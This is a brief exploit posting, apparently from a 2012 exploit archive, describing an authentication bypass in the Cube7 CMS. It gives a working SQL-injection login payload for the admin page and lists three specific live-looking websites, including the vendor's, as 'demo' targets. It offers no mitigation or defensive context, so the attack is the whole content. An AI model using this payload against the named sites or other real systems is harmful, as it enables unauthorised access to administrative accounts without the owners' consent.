Cube7 CMS Authentication Bypass Vulnerability
Software : Cube7
Date : 8/18/2012
Vendor : http://www.hedion.nl/default.asp?node=188&Cube7-CMS
Language : ASP
Author : ITTIHACK
Home : http://ittihack.com
Vulnerable File: login.asp
Exploit:
http://target/admin/login.asp
Username:user: 'or''='
Password:pass: 'or''='
Demo :
http://www.hedion.nl/admin/login.asp <-- Software Developer
http://www.dinther.nl/admin/login.asp
http://www.vandinther.net/admin/login.asp